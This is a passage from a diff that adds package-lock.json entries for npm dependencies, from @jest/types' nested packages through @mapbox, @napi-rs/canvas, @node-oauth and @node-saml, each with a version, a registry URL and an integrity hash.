"version": "4.3.0", + "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-4.3.0.tgz", + "integrity": "sha512-zbB9rCJAT1rbjiVDb2hqKFHNYLxgtk8NURxZ3IZwD3F6NtxbXZQCnnSi1Lkx+IDohdPlFp222wVALIheZJQSEg==", + "dev": true, + "dependencies": { + "color-convert": "^2.0.1" + }, + "engines": { + "node": ">=8" + }, + "funding": { + "url": "https://github.com/chalk/ansi-styles?sponsor=1" + } + }, + "node_modules/@jest/types/node_modules/chalk": { + "version": "4.1.2", + "resolved": "https://registry.npmjs.org/chalk/-/chalk-4.1.2.tgz", + "integrity": "sha512-oKnbhFyRIXpUuez8iBMmyEa4nbj4IOQyuhc/wy9kY7/WVPcwIO9VA668Pu8RkO7+0G76SLROeyw9CpQ061i4mA==", + "dev": true, + "dependencies": { + "ansi-styles": "^4.1.0", + "supports-color": "^7.1.0" + }, + "engines": { + "node": ">=10" + }, + "funding": { + "url": "https://github.com/chalk/chalk?sponsor=1" + } + }, + 
"node_modules/@jest/types/node_modules/supports-color": { + "version": "7.2.0", + "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-7.2.0.tgz", + "integrity": "sha512-qpCAvRl9stuOHveKsn7HncJRvv501qIacKzQlO/+Lwxc9+0q2wLyv4Dfvt80/DPn2pqOBsJdDiogXGR9+OvwRw==", + "dev": true, + "dependencies": { + "has-flag": "^4.0.0" + }, + "engines": { + "node": ">=8" + } + }, + "node_modules/@jridgewell/gen-mapping": { + "version": "0.3.5", + "resolved": "https://registry.npmjs.org/@jridgewell/gen-mapping/-/gen-mapping-0.3.5.tgz", + "integrity": "sha512-IzL8ZoEDIBRWEzlCcRhOaCupYyN5gdIK+Q6fbFdPDg6HqX6jpkItn7DFIpW9LQzXG6Df9sA7+OKnq0qlz/GaQg==", + "dev": true, + "dependencies": { + "@jridgewell/set-array": "^1.2.1", + "@jridgewell/sourcemap-codec": "^1.4.10", + "@jridgewell/trace-mapping": "^0.3.24" + }, + "engines": { + "node": ">=6.0.0" + } + }, + "node_modules/@jridgewell/resolve-uri": { + "version": "3.1.0", + "resolved": "https://registry.npmjs.org/@jridgewell/resolve-uri/-/resolve-uri-3.1.0.tgz", + "integrity": "sha512-F2msla3tad+Mfht5cJq7LSXcdudKTWCVYUgw6pLFOOHSTtZlj6SWNYAp+AhuqLmWdBO2X5hPrLcu8cVP8fy28w==", + "dev": true, + "engines": { + "node": ">=6.0.0" + } + }, + "node_modules/@jridgewell/set-array": { + "version": "1.2.1", + "resolved": "https://registry.npmjs.org/@jridgewell/set-array/-/set-array-1.2.1.tgz", + "integrity": "sha512-R8gLRTZeyp03ymzP/6Lil/28tGeGEzhx1q2k703KGWRAI1VdvPIXdG70VJc2pAMw3NA6JKL5hhFu1sJX0Mnn/A==", + "dev": true, + "engines": { + "node": ">=6.0.0" + } + }, + "node_modules/@jridgewell/source-map": { + "version": "0.3.6", + "resolved": "https://registry.npmjs.org/@jridgewell/source-map/-/source-map-0.3.6.tgz", + "integrity": "sha512-1ZJTZebgqllO79ue2bm3rIGud/bOe0pP5BjSRCRxxYkEZS8STV7zN84UBbiYu7jy+eCKSnVIUgoWWE/tt+shMQ==", + "dev": true, + "dependencies": { + "@jridgewell/gen-mapping": "^0.3.5", + "@jridgewell/trace-mapping": "^0.3.25" + } + }, + "node_modules/@jridgewell/sourcemap-codec": { + "version": "1.5.0", + "resolved": "https://registry.npmjs.org/@jridgewell/sourcemap-codec/-/sourcemap-codec-1.5.0.tgz", + "integrity": "sha512-gv3ZRaISU3fjPAgNsriBRqGWQL6quFx04YMPW/zD8XMLsU32mhCCbfbO6KZFLjvYpCZ8zyDEgqsgf+PwPaM7GQ==", + "dev": true, + "license": "MIT" + }, + "node_modules/@jridgewell/trace-mapping": { + "version": "0.3.25", + "resolved": "https://registry.npmjs.org/@jridgewell/trace-mapping/-/trace-mapping-0.3.25.tgz", + "integrity": "sha512-vNk6aEwybGtawWmy/PzwnGDOjCkLWSD2wqvjGGAgOAwCGWySYXfYoxt00IJkTF+8Lb57DwOb3Aa0o9CApepiYQ==", + "dev": true, + "dependencies": { + "@jridgewell/resolve-uri": "^3.1.0", + "@jridgewell/sourcemap-codec": "^1.4.14" + } + }, + "node_modules/@js-sdsl/ordered-map": { + "version": "4.4.2", + "resolved": "https://registry.npmjs.org/@js-sdsl/ordered-map/-/ordered-map-4.4.2.tgz", + "integrity": "sha512-iUKgm52T8HOE/makSxjqoWhe95ZJA1/G1sYsGev2JDKUSS14KAgg1LHb+Ba+IPow0xflbnSkOsZcO08C7w1gYw==", + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/js-sdsl" + } + }, + "node_modules/@jsdevtools/ono": { + "version": "7.1.3", + "resolved": "https://registry.npmjs.org/@jsdevtools/ono/-/ono-7.1.3.tgz", + "integrity": "sha512-4JQNk+3mVzK3xh2rqd6RB4J46qUR19azEHBneZyTZM+c456qOrbbM/5xcR8huNCCcbVt7+UmizG6GuUvPvKUYg==" + }, + "node_modules/@jsdoc/salty": { + "version": "0.2.8", + "resolved": "https://registry.npmjs.org/@jsdoc/salty/-/salty-0.2.8.tgz", + "integrity": "sha512-5e+SFVavj1ORKlKaKr2BmTOekmXbelU7dC0cDkQLqag7xfuTPuGMUFx7KWJuv4bYZrTsoL2Z18VVCOKYxzoHcg==", + "dependencies": { + "lodash": "^4.17.21" + }, + 
"engines": { + "node": ">=v12.0.0" + } + }, + "node_modules/@jsonjoy.com/base64": { + "version": "1.1.2", + "resolved": "https://registry.npmjs.org/@jsonjoy.com/base64/-/base64-1.1.2.tgz", + "integrity": "sha512-q6XAnWQDIMA3+FTiOYajoYqySkO+JSat0ytXGSuRdq9uXE7o92gzuQwQM14xaCRlBLGq3v5miDGC4vkVTn54xA==", + "dev": true, + "license": "Apache-2.0", + "engines": { + "node": ">=10.0" + }, + "funding": { + "type": "github", + "url": "https://github.com/sponsors/streamich" + }, + "peerDependencies": { + "tslib": "2" + } + }, + "node_modules/@jsonjoy.com/json-pack": { + "version": "1.2.0", + "resolved": "https://registry.npmjs.org/@jsonjoy.com/json-pack/-/json-pack-1.2.0.tgz", + "integrity": "sha512-io1zEbbYcElht3tdlqEOFxZ0dMTYrHz9iMf0gqn1pPjZFTCgM5R4R5IMA20Chb2UPYYsxjzs8CgZ7Nb5n2K2rA==", + "dev": true, + "license": "Apache-2.0", + "dependencies": { + "@jsonjoy.com/base64": "^1.1.1", + "@jsonjoy.com/util": "^1.1.2", + "hyperdyperid": "^1.2.0", + "thingies": "^1.20.0" + }, + "engines": { + "node": ">=10.0" + }, + "funding": { + "type": "github", + "url": "https://github.com/sponsors/streamich" + }, + "peerDependencies": { + "tslib": "2" + } + }, + "node_modules/@jsonjoy.com/util": { + "version": "1.5.0", + "resolved": "https://registry.npmjs.org/@jsonjoy.com/util/-/util-1.5.0.tgz", + "integrity": "sha512-ojoNsrIuPI9g6o8UxhraZQSyF2ByJanAY4cTFbc8Mf2AXEF4aQRGY1dJxyJpuyav8r9FGflEt/Ff3u5Nt6YMPA==", + "dev": true, + "license": "Apache-2.0", + "engines": { + "node": ">=10.0" + }, + "funding": { + "type": "github", + "url": "https://github.com/sponsors/streamich" + }, + "peerDependencies": { + "tslib": "2" + } + }, + "node_modules/@juggle/resize-observer": { + "version": "3.3.1", + "resolved": "https://registry.npmjs.org/@juggle/resize-observer/-/resize-observer-3.3.1.tgz", + "integrity": "sha512-zMM9Ds+SawiUkakS7y94Ymqx+S0ORzpG3frZirN3l+UlXUmSUR7hF4wxCVqW+ei94JzV5kt0uXBcoOEAuiydrw==", + "dev": true + }, + "node_modules/@leichtgewicht/ip-codec": { + "version": "2.0.5", + "resolved": "https://registry.npmjs.org/@leichtgewicht/ip-codec/-/ip-codec-2.0.5.tgz", + "integrity": "sha512-Vo+PSpZG2/fmgmiNzYK9qWRh8h/CHrwD0mo1h1DzL4yzHNSfWYujGTYsWGreD000gcgmZ7K4Ys6Tx9TxtsKdDw==", + "dev": true, + "license": "MIT" + }, + "node_modules/@lezer/common": { + "version": "1.2.3", + "resolved": "https://registry.npmjs.org/@lezer/common/-/common-1.2.3.tgz", + "integrity": "sha512-w7ojc8ejBqr2REPsWxJjrMFsA/ysDCFICn8zEOR9mrqzOu2amhITYuLD8ag6XZf0CFXDrhKqw7+tW8cX66NaDA==", + "dev": true, + "license": "MIT" + }, + "node_modules/@lezer/css": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/@lezer/css/-/css-1.0.0.tgz", + "integrity": "sha512-616VqgDKumHmYIuxs3tnX1irEQmoDHgF/TlP4O5ICWwyHwLMErq+8iKVuzTkOdBqvYAVmObqThcDEAaaMJjAdg==", + "dev": true, + "dependencies": { + "@lezer/highlight": "^1.0.0", + "@lezer/lr": "^1.0.0" + } + }, + "node_modules/@lezer/generator": { + "version": "1.7.1", + "resolved": "https://registry.npmjs.org/@lezer/generator/-/generator-1.7.1.tgz", + "integrity": "sha512-MgPJN9Si+ccxzXl3OAmCeZuUKw4XiPl4y664FX/hnnyG9CTqUPq65N3/VGPA2jD23D7QgMTtNqflta+cPN+5mQ==", + "dev": true, + "dependencies": { + "@lezer/common": "^1.1.0", + "@lezer/lr": "^1.3.0" + }, + "bin": { + "lezer-generator": "src/lezer-generator.cjs" + } + }, + "node_modules/@lezer/highlight": { + "version": "1.2.1", + "resolved": "https://registry.npmjs.org/@lezer/highlight/-/highlight-1.2.1.tgz", + "integrity": "sha512-Z5duk4RN/3zuVO7Jq0pGLJ3qynpxUVsh7IbUbGj88+uV2ApSAn6kWg2au3iJb+0Zi7kKtqffIESgNcRXWZWmSA==", + "dev": true, + "dependencies": 
{ + "@lezer/common": "^1.0.0" + } + }, + "node_modules/@lezer/html": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/@lezer/html/-/html-1.0.0.tgz", + "integrity": "sha512-wZHBcieArLTxEi198hqRBBHMySzDKo5suWaESdUw0t44IXp01vkSRwX2brG1qBbKdwJ+C6U0iMl00vWNiyAROg==", + "dev": true, + "dependencies": { + "@lezer/highlight": "^1.0.0", + "@lezer/lr": "^1.0.0" + } + }, + "node_modules/@lezer/javascript": { + "version": "1.0.1", + "resolved": "https://registry.npmjs.org/@lezer/javascript/-/javascript-1.0.1.tgz", + "integrity": "sha512-t7fpf3+gi/jiAtW+Gv734TbKdpPg6b8qATH01/jprW9H2oR++Tb688IHwJvZbk9F4GjpCEv86beuHMpUyC1b5g==", + "dev": true, + "dependencies": { + "@lezer/highlight": "^1.0.0", + "@lezer/lr": "^1.0.0" + } + }, + "node_modules/@lezer/lr": { + "version": "1.4.2", + "resolved": "https://registry.npmjs.org/@lezer/lr/-/lr-1.4.2.tgz", + "integrity": "sha512-pu0K1jCIdnQ12aWNaAVU5bzi7Bd1w54J3ECgANPmYLtQKP0HBj2cE/5coBD66MT10xbtIuUr7tg0Shbsvk0mDA==", + "dev": true, + "dependencies": { + "@lezer/common": "^1.0.0" + } + }, + "node_modules/@lezer/markdown": { + "version": "1.3.2", + "resolved": "https://registry.npmjs.org/@lezer/markdown/-/markdown-1.3.2.tgz", + "integrity": "sha512-Wu7B6VnrKTbBEohqa63h5vxXjiC4pO5ZQJ/TDbhJxPQaaIoRD/6UVDhSDtVsCwVZV12vvN9KxuLL3ATMnlG0oQ==", + "dev": true, + "license": "MIT", + "dependencies": { + "@lezer/common": "^1.0.0", + "@lezer/highlight": "^1.0.0" + } + }, + "node_modules/@lukeed/csprng": { + "version": "1.1.0", + "resolved": "https://registry.npmjs.org/@lukeed/csprng/-/csprng-1.1.0.tgz", + "integrity": "sha512-Z7C/xXCiGWsg0KuKsHTKJxbWhpI3Vs5GwLfOean7MGyVFGqdRgBbAjOCh6u4bbjPc/8MJ2pZmK/0DLdCbivLDA==", + "license": "MIT", + "engines": { + "node": ">=8" + } + }, + "node_modules/@lukeed/uuid": { + "version": "2.0.1", + "resolved": "https://registry.npmjs.org/@lukeed/uuid/-/uuid-2.0.1.tgz", + "integrity": "sha512-qC72D4+CDdjGqJvkFMMEAtancHUQ7/d/tAiHf64z8MopFDmcrtbcJuerDtFceuAfQJ2pDSfCKCtbqoGBNnwg0w==", + "license": "MIT", + "dependencies": { + "@lukeed/csprng": "^1.1.0" + }, + "engines": { + "node": ">=8" + } + }, + "node_modules/@mapbox/node-pre-gyp": { + "version": "1.0.8", + "resolved": "https://registry.npmjs.org/@mapbox/node-pre-gyp/-/node-pre-gyp-1.0.8.tgz", + "integrity": "sha512-CMGKi28CF+qlbXh26hDe6NxCd7amqeAzEqnS6IHeO6LoaKyM/n+Xw3HT1COdq8cuioOdlKdqn/hCmqPUOMOywg==", + "dependencies": { + "detect-libc": "^1.0.3", + "https-proxy-agent": "^5.0.0", + "make-dir": "^3.1.0", + "node-fetch": "^2.6.5", + "nopt": "^5.0.0", + "npmlog": "^5.0.1", + "rimraf": "^3.0.2", + "semver": "^7.3.5", + "tar": "^6.1.11" + }, + "bin": { + "node-pre-gyp": "bin/node-pre-gyp" + } + }, + "node_modules/@mapbox/node-pre-gyp/node_modules/lru-cache": { + "version": "6.0.0", + "resolved": "https://registry.npmjs.org/lru-cache/-/lru-cache-6.0.0.tgz", + "integrity": "sha512-Jo6dJ04CmSjuznwJSS3pUeWmd/H0ffTlkXXgwZi+eq1UCmqQwCh+eLsYOYCwY991i2Fah4h1BEMCx4qThGbsiA==", + "dependencies": { + "yallist": "^4.0.0" + }, + "engines": { + "node": ">=10" + } + }, + "node_modules/@mapbox/node-pre-gyp/node_modules/make-dir": { + "version": "3.1.0", + "resolved": "https://registry.npmjs.org/make-dir/-/make-dir-3.1.0.tgz", + "integrity": "sha512-g3FeP20LNwhALb/6Cz6Dd4F2ngze0jz7tbzrD2wAV+o9FeNHe4rL+yK2md0J/fiSf1sa1ADhXqi5+oVwOM/eGw==", + "dependencies": { + "semver": "^6.0.0" + }, + "engines": { + "node": ">=8" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/@mapbox/node-pre-gyp/node_modules/make-dir/node_modules/semver": { + "version": "6.3.1", + 
"resolved": "https://registry.npmjs.org/semver/-/semver-6.3.1.tgz", + "integrity": "sha512-BR7VvDCVHO+q2xBEWskxS6DJE1qRnb7DxzUrogb71CWoSficBxYsiAGd+Kl0mmq/MprG9yArRkyrQxTO6XjMzA==", + "bin": { + "semver": "bin/semver.js" + } + }, + "node_modules/@mapbox/node-pre-gyp/node_modules/rimraf": { + "version": "3.0.2", + "resolved": "https://registry.npmjs.org/rimraf/-/rimraf-3.0.2.tgz", + "integrity": "sha512-JZkJMZkAGFFPP2YqXZXPbMlMBgsxzE8ILs4lMIX/2o0L9UBw9O/Y3o6wFw/i9YLapcUJWwqbi3kdxIPdC62TIA==", + "dependencies": { + "glob": "^7.1.3" + }, + "bin": { + "rimraf": "bin.js" + }, + "funding": { + "url": "https://github.com/sponsors/isaacs" + } + }, + "node_modules/@mapbox/node-pre-gyp/node_modules/semver": { + "version": "7.5.4", + "resolved": "https://registry.npmjs.org/semver/-/semver-7.5.4.tgz", + "integrity": "sha512-1bCSESV6Pv+i21Hvpxp3Dx+pSD8lIPt8uVjRrxAUt/nbswYc+tK6Y2btiULjd4+fnq15PX+nqQDC7Oft7WkwcA==", + "dependencies": { + "lru-cache": "^6.0.0" + }, + "bin": { + "semver": "bin/semver.js" + }, + "engines": { + "node": ">=10" + } + }, + "node_modules/@mapbox/node-pre-gyp/node_modules/yallist": { + "version": "4.0.0", + "resolved": "https://registry.npmjs.org/yallist/-/yallist-4.0.0.tgz", + "integrity": "sha512-3wdGidZyq5PB084XLES5TpOSRA3wjXAlIWMhum2kRcv/41Sn2emQ0dycQW4uZXLejwKvg6EsvbdlVL+FYEct7A==" + }, + "node_modules/@marijn/find-cluster-break": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/@marijn/find-cluster-break/-/find-cluster-break-1.0.2.tgz", + "integrity": "sha512-l0h88YhZFyKdXIFNfSWpyjStDjGHwZ/U7iobcK1cQQD8sejsONdQtTVU+1wVN1PBw40PiiHB1vA5S7VTfQiP9g==", + "dev": true, + "license": "MIT" + }, + "node_modules/@maxmind/geoip2-node": { + "version": "5.0.0", + "resolved": "https://registry.npmjs.org/@maxmind/geoip2-node/-/geoip2-node-5.0.0.tgz", + "integrity": "sha512-ki+q5//oU4tZ3BAhegZJcB5czoZyic5JSTEKbrUAQB/BzAoAiGyLW0immEmQvVVyy2SMlvBTJ3zqyRj8K9BbwQ==", + "dependencies": { + "ip6addr": "^0.2.5", + "maxmind": "^4.2.0" + } + }, + "node_modules/@mdx-js/react": { + "version": "3.1.0", + "resolved": "https://registry.npmjs.org/@mdx-js/react/-/react-3.1.0.tgz", + "integrity": "sha512-QjHtSaoameoalGnKDT3FoIl4+9RwyTmo9ZJGBdLOks/YOiWHoRDI3PUwEzOE7kEmGcV3AFcp9K6dYu9rEuKLAQ==", + "dev": true, + "license": "MIT", + "dependencies": { + "@types/mdx": "^2.0.0" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/unified" + }, + "peerDependencies": { + "@types/react": ">=16", + "react": ">=16" + } + }, + "node_modules/@mongodb-js/saslprep": { + "version": "1.1.9", + "resolved": "https://registry.npmjs.org/@mongodb-js/saslprep/-/saslprep-1.1.9.tgz", + "integrity": "sha512-tVkljjeEaAhCqTzajSdgbQ6gE6f3oneVwa3iXR6csiEwXXOFsiC6Uh9iAjAhXPtqa/XMDHWjjeNH/77m/Yq2dw==", + "dependencies": { + "sparse-bitfield": "^3.0.3" + } + }, + "node_modules/@msgpackr-extract/msgpackr-extract-darwin-arm64": { + "version": "3.0.3", + "resolved": "https://registry.npmjs.org/@msgpackr-extract/msgpackr-extract-darwin-arm64/-/msgpackr-extract-darwin-arm64-3.0.3.tgz", + "integrity": "sha512-QZHtlVgbAdy2zAqNA9Gu1UpIuI8Xvsd1v8ic6B2pZmeFnFcMWiPLfWXh7TVw4eGEZ/C9TH281KwhVoeQUKbyjw==", + "cpu": [ + "arm64" + ], + "license": "MIT", + "optional": true, + "os": [ + "darwin" + ] + }, + "node_modules/@msgpackr-extract/msgpackr-extract-darwin-x64": { + "version": "3.0.3", + "resolved": "https://registry.npmjs.org/@msgpackr-extract/msgpackr-extract-darwin-x64/-/msgpackr-extract-darwin-x64-3.0.3.tgz", + "integrity": 
"sha512-mdzd3AVzYKuUmiWOQ8GNhl64/IoFGol569zNRdkLReh6LRLHOXxU4U8eq0JwaD8iFHdVGqSy4IjFL4reoWCDFw==", + "cpu": [ + "x64" + ], + "license": "MIT", + "optional": true, + "os": [ + "darwin" + ] + }, + "node_modules/@msgpackr-extract/msgpackr-extract-linux-arm": { + "version": "3.0.3", + "resolved": "https://registry.npmjs.org/@msgpackr-extract/msgpackr-extract-linux-arm/-/msgpackr-extract-linux-arm-3.0.3.tgz", + "integrity": "sha512-fg0uy/dG/nZEXfYilKoRe7yALaNmHoYeIoJuJ7KJ+YyU2bvY8vPv27f7UKhGRpY6euFYqEVhxCFZgAUNQBM3nw==", + "cpu": [ + "arm" + ], + "license": "MIT", + "optional": true, + "os": [ + "linux" + ] + }, + "node_modules/@msgpackr-extract/msgpackr-extract-linux-arm64": { + "version": "3.0.3", + "resolved": "https://registry.npmjs.org/@msgpackr-extract/msgpackr-extract-linux-arm64/-/msgpackr-extract-linux-arm64-3.0.3.tgz", + "integrity": "sha512-YxQL+ax0XqBJDZiKimS2XQaf+2wDGVa1enVRGzEvLLVFeqa5kx2bWbtcSXgsxjQB7nRqqIGFIcLteF/sHeVtQg==", + "cpu": [ + "arm64" + ], + "license": "MIT", + "optional": true, + "os": [ + "linux" + ] + }, + "node_modules/@msgpackr-extract/msgpackr-extract-linux-x64": { + "version": "3.0.3", + "resolved": "https://registry.npmjs.org/@msgpackr-extract/msgpackr-extract-linux-x64/-/msgpackr-extract-linux-x64-3.0.3.tgz", + "integrity": "sha512-cvwNfbP07pKUfq1uH+S6KJ7dT9K8WOE4ZiAcsrSes+UY55E/0jLYc+vq+DO7jlmqRb5zAggExKm0H7O/CBaesg==", + "cpu": [ + "x64" + ], + "license": "MIT", + "optional": true, + "os": [ + "linux" + ] + }, + "node_modules/@msgpackr-extract/msgpackr-extract-win32-x64": { + "version": "3.0.3", + "resolved": "https://registry.npmjs.org/@msgpackr-extract/msgpackr-extract-win32-x64/-/msgpackr-extract-win32-x64-3.0.3.tgz", + "integrity": "sha512-x0fWaQtYp4E6sktbsdAqnehxDgEc/VwM7uLsRCYWaiGu0ykYdZPiS8zCWdnjHwyiumousxfBm4SO31eXqwEZhQ==", + "cpu": [ + "x64" + ], + "license": "MIT", + "optional": true, + "os": [ + "win32" + ] + }, + "node_modules/@napi-rs/canvas": { + "version": "0.1.65", + "resolved": "https://registry.npmjs.org/@napi-rs/canvas/-/canvas-0.1.65.tgz", + "integrity": "sha512-YcFhXQcp+b2d38zFOJNbpyPHnIL7KAEkhJQ+UeeKI5IpE9B8Cpf/M6RiHPQXSsSqnYbrfFylnW49dyh2oeSblQ==", + "dev": true, + "license": "MIT", + "optional": true, + "engines": { + "node": ">= 10" + }, + "optionalDependencies": { + "@napi-rs/canvas-android-arm64": "0.1.65", + "@napi-rs/canvas-darwin-arm64": "0.1.65", + "@napi-rs/canvas-darwin-x64": "0.1.65", + "@napi-rs/canvas-linux-arm-gnueabihf": "0.1.65", + "@napi-rs/canvas-linux-arm64-gnu": "0.1.65", + "@napi-rs/canvas-linux-arm64-musl": "0.1.65", + "@napi-rs/canvas-linux-riscv64-gnu": "0.1.65", + "@napi-rs/canvas-linux-x64-gnu": "0.1.65", + "@napi-rs/canvas-linux-x64-musl": "0.1.65", + "@napi-rs/canvas-win32-x64-msvc": "0.1.65" + } + }, + "node_modules/@napi-rs/canvas-android-arm64": { + "version": "0.1.65", + "resolved": "https://registry.npmjs.org/@napi-rs/canvas-android-arm64/-/canvas-android-arm64-0.1.65.tgz", + "integrity": "sha512-ZYwqFYEKcT5Zr8lbiaJNJj/poLaeK2TncolY914r+gD2TJNeP7ZqvE7A2SX/1C9MB4E3DQEwm3YhL3WEf0x3MQ==", + "cpu": [ + "arm64" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "android" + ], + "engines": { + "node": ">= 10" + } + }, + "node_modules/@napi-rs/canvas-darwin-arm64": { + "version": "0.1.65", + "resolved": "https://registry.npmjs.org/@napi-rs/canvas-darwin-arm64/-/canvas-darwin-arm64-0.1.65.tgz", + "integrity": "sha512-Pg1pfiJEyDIsX+V0QaJPRWvXbw5zmWAk3bivFCvt/5pwZb37/sT6E/RqPHT9NnqpDyKW6SriwY9ypjljysUA1Q==", + "cpu": [ + "arm64" + ], + "dev": true, + "license": "MIT", + "optional": true, + 
"os": [ + "darwin" + ], + "engines": { + "node": ">= 10" + } + }, + "node_modules/@napi-rs/canvas-darwin-x64": { + "version": "0.1.65", + "resolved": "https://registry.npmjs.org/@napi-rs/canvas-darwin-x64/-/canvas-darwin-x64-0.1.65.tgz", + "integrity": "sha512-3Tr+/HjdJN7Z/VKIcsxV2DvDIibZCExgfYTgljCkUSFuoI7iNkOE6Dc1Q6j212EB9PeO8KmfrViBqHYT6IwWkA==", + "cpu": [ + "x64" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "darwin" + ], + "engines": { + "node": ">= 10" + } + }, + "node_modules/@napi-rs/canvas-linux-arm-gnueabihf": { + "version": "0.1.65", + "resolved": "https://registry.npmjs.org/@napi-rs/canvas-linux-arm-gnueabihf/-/canvas-linux-arm-gnueabihf-0.1.65.tgz", + "integrity": "sha512-3KP+dYObH7CVkZMZWwk1WX9jRjL+EKdQtD43H8MOI+illf+dwqLlecdQ4d9bQRIxELKJ8dyPWY4fOp/Ngufrdg==", + "cpu": [ + "arm" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "linux" + ], + "engines": { + "node": ">= 10" + } + }, + "node_modules/@napi-rs/canvas-linux-arm64-gnu": { + "version": "0.1.65", + "resolved": "https://registry.npmjs.org/@napi-rs/canvas-linux-arm64-gnu/-/canvas-linux-arm64-gnu-0.1.65.tgz", + "integrity": "sha512-Ka3StKz7Dq7kjTF3nNJCq43UN/VlANS7qGE3dWkn1d+tQNsCRy/wRmyt1TUFzIjRqcTFMQNRbgYq84+53UBA0A==", + "cpu": [ + "arm64" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "linux" + ], + "engines": { + "node": ">= 10" + } + }, + "node_modules/@napi-rs/canvas-linux-arm64-musl": { + "version": "0.1.65", + "resolved": "https://registry.npmjs.org/@napi-rs/canvas-linux-arm64-musl/-/canvas-linux-arm64-musl-0.1.65.tgz", + "integrity": "sha512-O4xMASm2JrmqYoiDyxVWi+z5C14H+oVEag2rZ5iIA67dhWqYZB+iO7wCFpBYRj31JPBR29FOsu6X9zL+DwBFdw==", + "cpu": [ + "arm64" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "linux" + ], + "engines": { + "node": ">= 10" + } + }, + "node_modules/@napi-rs/canvas-linux-riscv64-gnu": { + "version": "0.1.65", + "resolved": "https://registry.npmjs.org/@napi-rs/canvas-linux-riscv64-gnu/-/canvas-linux-riscv64-gnu-0.1.65.tgz", + "integrity": "sha512-dblWDaA59ZU8bPbkfM+riSke7sFbNZ70LEevUdI5rgiFEUzYUQlU34gSBzemTACj5rCWt1BYeu0GfkLSjNMBSw==", + "cpu": [ + "riscv64" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "linux" + ], + "engines": { + "node": ">= 10" + } + }, + "node_modules/@napi-rs/canvas-linux-x64-gnu": { + "version": "0.1.65", + "resolved": "https://registry.npmjs.org/@napi-rs/canvas-linux-x64-gnu/-/canvas-linux-x64-gnu-0.1.65.tgz", + "integrity": "sha512-wsp+atutw13OJXGU3DDkdngtBDoEg01IuK5xMe0L6VFPV8maGkh17CXze078OD5QJOc6kFyw3DDscMLOPF8+oA==", + "cpu": [ + "x64" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "linux" + ], + "engines": { + "node": ">= 10" + } + }, + "node_modules/@napi-rs/canvas-linux-x64-musl": { + "version": "0.1.65", + "resolved": "https://registry.npmjs.org/@napi-rs/canvas-linux-x64-musl/-/canvas-linux-x64-musl-0.1.65.tgz", + "integrity": "sha512-odX+nN+IozWzhdj31INcHz3Iy9+EckNw+VqsZcaUxZOTu7/3FmktRNI6aC1qe5minZNv1m05YOS1FVf7fvmjlA==", + "cpu": [ + "x64" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "linux" + ], + "engines": { + "node": ">= 10" + } + }, + "node_modules/@napi-rs/canvas-win32-x64-msvc": { + "version": "0.1.65", + "resolved": "https://registry.npmjs.org/@napi-rs/canvas-win32-x64-msvc/-/canvas-win32-x64-msvc-0.1.65.tgz", + "integrity": "sha512-RZQX3luWnlNWgdMnLMQ1hyfQraeAn9lnxWWVCHuUM4tAWEV8UDdeb7cMwmJW7eyt8kAosmjeHt3cylQMHOxGFg==", + "cpu": [ + "x64" + ], + "dev": true, + "license": 
"MIT", + "optional": true, + "os": [ + "win32" + ], + "engines": { + "node": ">= 10" + } + }, + "node_modules/@nicolo-ribaudo/chokidar-2": { + "version": "2.1.8-no-fsevents.3", + "resolved": "https://registry.npmjs.org/@nicolo-ribaudo/chokidar-2/-/chokidar-2-2.1.8-no-fsevents.3.tgz", + "integrity": "sha512-s88O1aVtXftvp5bCPB7WnmXc5IwOZZ7YPuwNPt+GtOOXpPvad1LfbmjYv+qII7zP6RU2QGnqve27dnLycEnyEQ==", + "dev": true, + "optional": true + }, + "node_modules/@node-oauth/formats": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/@node-oauth/formats/-/formats-1.0.0.tgz", + "integrity": "sha512-DwSbLtdC8zC5B5gTJkFzJj5s9vr9SGzOgQvV9nH7tUVuMSScg0EswAczhjIapOmH3Y8AyP7C4Jv7b8+QJObWZA==" + }, + "node_modules/@node-oauth/oauth2-server": { + "version": "5.1.0", + "resolved": "https://registry.npmjs.org/@node-oauth/oauth2-server/-/oauth2-server-5.1.0.tgz", + "integrity": "sha512-sYvqL1GeZLRSwgl++/oOzxJj/ZBe2yXnp6E5LGNQ5qjpn0+t/dwquXILUe3Sk2Y8/wU7XeRxToOtBVeSVkuJag==", + "dependencies": { + "@node-oauth/formats": "1.0.0", + "basic-auth": "2.0.1", + "type-is": "1.6.18" + }, + "engines": { + "node": ">=16.0.0" + } + }, + "node_modules/@node-rs/crc32": { + "version": "0.1.8", + "resolved": "https://registry.npmjs.org/@node-rs/crc32/-/crc32-0.1.8.tgz", + "integrity": "sha512-gnQhWJDieK9gg+b4g1IR7T3CvBQw15hmPPNc9oTtDCRKITStG1QtfGwLXnGtusxGCLoeDJAKlVHTVDNoeJ29LQ==", + "optional": true, + "dependencies": { + "@node-rs/helper": "^0.1.4" + } + }, + "node_modules/@node-rs/helper": { + "version": "0.1.4", + "resolved": "https://registry.npmjs.org/@node-rs/helper/-/helper-0.1.4.tgz", + "integrity": "sha512-f63wMA9m32dkX40XWCbDysoFLFGf+6WB/Vn90mW3CQVQe2hqgQPHLBMgriuI9eW9gnqdLnuHQGArg1WALeXCYA==", + "optional": true, + "dependencies": { + "tslib": "^2.0.0" + } + }, + "node_modules/@node-saml/node-saml": { + "version": "4.0.5", + "resolved": "https://registry.npmjs.org/@node-saml/node-saml/-/node-saml-4.0.5.tgz", + "integrity": "sha512-J5DglElbY1tjOuaR1NPtjOXkXY5bpUhDoKVoeucYN98A3w4fwgjIOPqIGcb6cQsqFq2zZ6vTCeKn5C/hvefSaw==", + "dependencies": { + "@types/debug": "^4.1.7", + "@types/passport": "^1.0.11", + "@types/xml-crypto": 